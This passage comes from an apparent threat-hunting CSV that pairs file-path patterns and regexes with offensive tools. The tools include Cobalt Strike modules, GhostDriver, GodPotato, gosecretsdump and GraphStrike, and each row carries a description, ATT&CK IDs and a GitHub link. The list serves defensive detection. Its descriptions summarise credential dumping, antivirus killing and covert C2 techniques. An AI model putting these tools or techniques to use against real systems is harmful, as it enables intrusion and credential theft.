No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Get-SpoolStatus.ps1*",".{0,1000}\\Get\-SpoolStatus\.ps1.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*\Get-TGSCipher.ps1*",".{0,1000}\\Get\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Get-UnConstrained.ps1*",".{0,1000}\\Get\-UnConstrained\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\GetWebDAVStatus\",".{0,1000}\\GetWebDAVStatus\\","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*\GetWebDAVStatus_x64*",".{0,1000}\\GetWebDAVStatus_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*\GetWhoamiCommand.cs",".{0,1000}\\GetWhoamiCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetWinStationCommand.cs",".{0,1000}\\GetWinStationCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\GetWmiObjectCommand.cs",".{0,1000}\\GetWmiObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\gfscgsvs.log*",".{0,1000}\\gfscgsvs\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ghauri\ghauri\*",".{0,1000}\\ghauri\\ghauri\\.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*\ghauri-1*\ghauri\*",".{0,1000}\\ghauri\-1.{0,1000}\\ghauri\\.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*\GhostDriver.exe*",".{0,1000}\\GhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*\ghostdriver.sys*",".{0,1000}\\ghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*\GhostDriver-main\*",".{0,1000}\\GhostDriver\-main\\.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" 
"*\GhostMapper.sln*",".{0,1000}\\GhostMapper\.sln.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","0","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*\GhostTask.h*",".{0,1000}\\GhostTask\.h.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*\GhostTask\*",".{0,1000}\\GhostTask\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*\GhostTask-1.0\*",".{0,1000}\\GhostTask\-1\.0\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*\GhostTask-main*",".{0,1000}\\GhostTask\-main.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*\glit.exe*",".{0,1000}\\glit\.exe.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*\glit-cli*",".{0,1000}\\glit\-cli.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*\gmailC2.exe*",".{0,1000}\\gmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*\GMSAPasswordReader.exe*",".{0,1000}\\GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\gocrack-1.0.zip*",".{0,1000}\\gocrack\-1\.0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*\gocrack-master.*",".{0,1000}\\gocrack\-master\..{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*\GodFault.*",".{0,1000}\\GodFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*\godoh\cmd\*",".{0,1000}\\godoh\\cmd\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. 
that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\godoh\dnsclient\*",".{0,1000}\\godoh\\dnsclient\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\godoh\dnsserver*",".{0,1000}\\godoh\\dnsserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\godoh\lib\*",".{0,1000}\\godoh\\lib\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\godoh\protocol\*",".{0,1000}\\godoh\\protocol\\.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*\Godpotato\*",".{0,1000}\\Godpotato\\.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*\GoFetchLog.log*",".{0,1000}\\GoFetchLog\.log.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*\goldenPac.py*",".{0,1000}\\goldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\go-secdump*",".{0,1000}\\go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*\gosecretsdump*",".{0,1000}\\gosecretsdump.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*\gosecretsdump.*",".{0,1000}\\gosecretsdump\..{0,1000}","offensive_tool_keyword","gosecretsdump","Dump 
ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\gosecretsdump\*",".{0,1000}\\gosecretsdump\\.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\gosecretsdump_linux*",".{0,1000}\\gosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\gosecretsdump_mac*",".{0,1000}\\gosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\gosecretsdump_win*",".{0,1000}\\gosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*\GoStompy.go*",".{0,1000}\\GoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*\goWMIExec_linux_*",".{0,1000}\\goWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*\goWMIExec_mac_*",".{0,1000}\\goWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*\goWMIExec_win_*",".{0,1000}\\goWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*\goZulipC2*",".{0,1000}\\goZulipC2.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*\GPOddity\*",".{0,1000}\\GPOddity\\.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*\gpp_autologin.py*",".{0,1000}\\gpp_autologin\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\gpp_password.py*",".{0,1000}\\gpp_password\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that 
helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\GraphLdr.x64.bin*",".{0,1000}\\GraphLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*\GraphRunner.ps1*",".{0,1000}\\GraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\GraphRunner-main*",".{0,1000}\\GraphRunner\-main.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\GraphSpy.py*",".{0,1000}\\GraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*\GraphSpy-master*",".{0,1000}\\GraphSpy\-master.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based 
GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*\GraphStrike.cna*",".{0,1000}\\GraphStrike\.cna.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*\GraphStrike.py*",".{0,1000}\\GraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*\GraphStrike-main\*",".{0,1000}\\GraphStrike\-main\\.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*\group_members.py*",".{0,1000}\\group_members\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
